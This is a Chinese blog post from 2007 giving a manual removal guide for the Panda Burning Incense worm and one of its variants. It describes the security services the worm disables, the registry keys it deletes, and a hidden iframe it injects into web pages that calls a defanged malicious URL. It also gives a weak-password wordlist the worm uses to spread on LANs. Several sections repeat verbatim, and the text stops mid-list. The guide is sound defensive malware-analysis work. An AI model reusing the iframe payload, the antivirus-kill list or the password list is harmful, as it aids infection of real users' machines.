手动清除最近横行的熊猫烧香病毒
|
相关文章
文章评论
2007-01-30 10:13:05
8.禁用安全软件相关服务:
Schedule
sharedaccess
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
9.删除安全软件相关启动项:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:
<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
但不修改以下目录中的网页文件:
C:\WINDOWS
C:\WINNT
C:\system32
C:\Documents and Settings
C:\System Volume Information
C:\Recycled
Program Files\Windows NT
Program Files\WindowsUpdate
Program Files\Windows Media Player
Program Files\Outlook Express
Program Files\Internet Explorer
Program Files\NetMeeting
Program Files\Common Files
Program Files\ComPlus Applications
Program Files\Messenger
Program Files\InstallShield Installation Information
Program Files\MSN
Program Files\Microsoft Frontpage
Program Files\Movie Maker
Program Files\MSN Gamin Zone
11.在访问过的目录下生成Desktop_.ini文件,内容为当前日期。
12.此外,病毒还会尝试删除GHO文件。
病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:
password
harley
golf
pussy
mustang
shadow
fish
qwerty
baseball
letmein
ccc
admin
abc
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
super
123asd
ihavenopass
godblessyou
enable
alpha
1234qwer
123abc
aaa
patrick
pat
administrator
root
sex
god
fuckyou
fuck
test
test123
temp
temp123
win
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
love
mypc
mypc123
admin123
mypass
mypass123
Administrator
Guest
admin
Root
病毒文件内含有这些信息:
whboy
***武*汉*男*生*感*染*下*载*者***
解决方案:
1. 结束病毒进程:
%System%\drivers\spoclsv.exe
不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。
“%System%\system32\spoclsv.exe”是系统文件。(目前看来没有出现插入该系统进程的变种,不排除变种的手法变化。)
查看当前运行spoclsv.exe的路径,可使用超级兔子魔法设置。
2. 删除病毒文件:
%System%\drivers\spoclsv.exe
请注意区分病毒和系统文件。详见步骤1。
Schedule
sharedaccess
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
9.删除安全软件相关启动项:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:
<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
但不修改以下目录中的网页文件:
C:\WINDOWS
C:\WINNT
C:\system32
C:\Documents and Settings
C:\System Volume Information
C:\Recycled
Program Files\Windows NT
Program Files\WindowsUpdate
Program Files\Windows Media Player
Program Files\Outlook Express
Program Files\Internet Explorer
Program Files\NetMeeting
Program Files\Common Files
Program Files\ComPlus Applications
Program Files\Messenger
Program Files\InstallShield Installation Information
Program Files\MSN
Program Files\Microsoft Frontpage
Program Files\Movie Maker
Program Files\MSN Gamin Zone
11.在访问过的目录下生成Desktop_.ini文件,内容为当前日期。
12.此外,病毒还会尝试删除GHO文件。
病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:
password
harley
golf
pussy
mustang
shadow
fish
qwerty
baseball
letmein
ccc
admin
abc
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
super
123asd
ihavenopass
godblessyou
enable
alpha
1234qwer
123abc
aaa
patrick
pat
administrator
root
sex
god
fuckyou
fuck
test
test123
temp
temp123
win
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
love
mypc
mypc123
admin123
mypass
mypass123
Administrator
Guest
admin
Root
病毒文件内含有这些信息:
whboy
***武*汉*男*生*感*染*下*载*者***
解决方案:
1. 结束病毒进程:
%System%\drivers\spoclsv.exe
不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。
“%System%\system32\spoclsv.exe”是系统文件。(目前看来没有出现插入该系统进程的变种,不排除变种的手法变化。)
查看当前运行spoclsv.exe的路径,可使用超级兔子魔法设置。
2. 删除病毒文件:
%System%\drivers\spoclsv.exe
请注意区分病毒和系统文件。详见步骤1。
2007-01-30 10:15:08
3. 删除病毒启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\spoclsv.exe"
4. 通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:
X:\setup.exe
X:\autorun.inf
5. 恢复被修改的“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
6. 修复或重新安装被破坏的安全软件。
7.修复被感染的程序。可用专杀工具进行修复,收集了四个供读者使用。金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。也可用手动方法(见本文末)。
8. 恢复被修改的网页文件,可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件,一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\spoclsv.exe"
4. 通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:
X:\setup.exe
X:\autorun.inf
5. 恢复被修改的“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
6. 修复或重新安装被破坏的安全软件。
7.修复被感染的程序。可用专杀工具进行修复,收集了四个供读者使用。金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。也可用手动方法(见本文末)。
8. 恢复被修改的网页文件,可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件,一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。
2007-01-30 10:17:05
熊猫烧香病毒变种二:病毒进程为“FuckJacks.exe”
以下是数据安全实验室提供的信息与方法。
病毒描述:
含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。
病毒基本情况:
[文件信息]
病毒名: Virus.Win32.EvilPanda.a.ex$
大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
SHA1 : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
壳信息: 未知
危害级别:高
病毒名: Flooder.Win32.FloodBots.a.ex$
大 小: 0xE800 (59392), (disk) 0xE800 (59392)
SHA1 : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
危害级别:高
病毒行为:
Virus.Win32.EvilPanda.a.ex$ :
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%\system32\FuckJacks.exe
2、添加注册表启动项目确保自身在系统重启动后被加载:
键路径:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键名:FuckJacks
键值:"C:WINDOWS\system32\FuckJacks.exe"
键路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键名:svohost
键值:"C:WINDOWS\system32\FuckJacks.exe"
3、拷贝自身到所有驱动器根目录,命名为Setup.exe,并生成一个autorun.inf使得用户打开该盘运行病毒,并将这两个文件属性设置为隐藏、只读、系统。
C:autorun.inf 1KB RHS
C:setup.exe 230KB RHS
4、关闭众多杀毒软件和安全工具。
5、连接网站下载某文件,并根据该文件记录的地址,去某网站下载某ddos程序,下载成功后执行该程序。
6、刷新某QQ秀链接。
7、循环遍历磁盘目录,感染文件,对关键系统文件跳过,不感染Wind ows媒体播放器、M S N、I E 等程序。
Flooder.Win32.FloodBots.a.ex$ :
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%\SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
%SystemRoot%\system32\SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
以下是数据安全实验室提供的信息与方法。
病毒描述:
含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。
病毒基本情况:
[文件信息]
病毒名: Virus.Win32.EvilPanda.a.ex$
大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
SHA1 : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
壳信息: 未知
危害级别:高
病毒名: Flooder.Win32.FloodBots.a.ex$
大 小: 0xE800 (59392), (disk) 0xE800 (59392)
SHA1 : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
危害级别:高
病毒行为:
Virus.Win32.EvilPanda.a.ex$ :
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%\system32\FuckJacks.exe
2、添加注册表启动项目确保自身在系统重启动后被加载:
键路径:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键名:FuckJacks
键值:"C:WINDOWS\system32\FuckJacks.exe"
键路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键名:svohost
键值:"C:WINDOWS\system32\FuckJacks.exe"
3、拷贝自身到所有驱动器根目录,命名为Setup.exe,并生成一个autorun.inf使得用户打开该盘运行病毒,并将这两个文件属性设置为隐藏、只读、系统。
C:autorun.inf 1KB RHS
C:setup.exe 230KB RHS
4、关闭众多杀毒软件和安全工具。
5、连接网站下载某文件,并根据该文件记录的地址,去某网站下载某ddos程序,下载成功后执行该程序。
6、刷新某QQ秀链接。
7、循环遍历磁盘目录,感染文件,对关键系统文件跳过,不感染Wind ows媒体播放器、M S N、I E 等程序。
Flooder.Win32.FloodBots.a.ex$ :
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%\SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
%SystemRoot%\system32\SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
sky108
博客统计信息
热门文章  最新评论 |
友情链接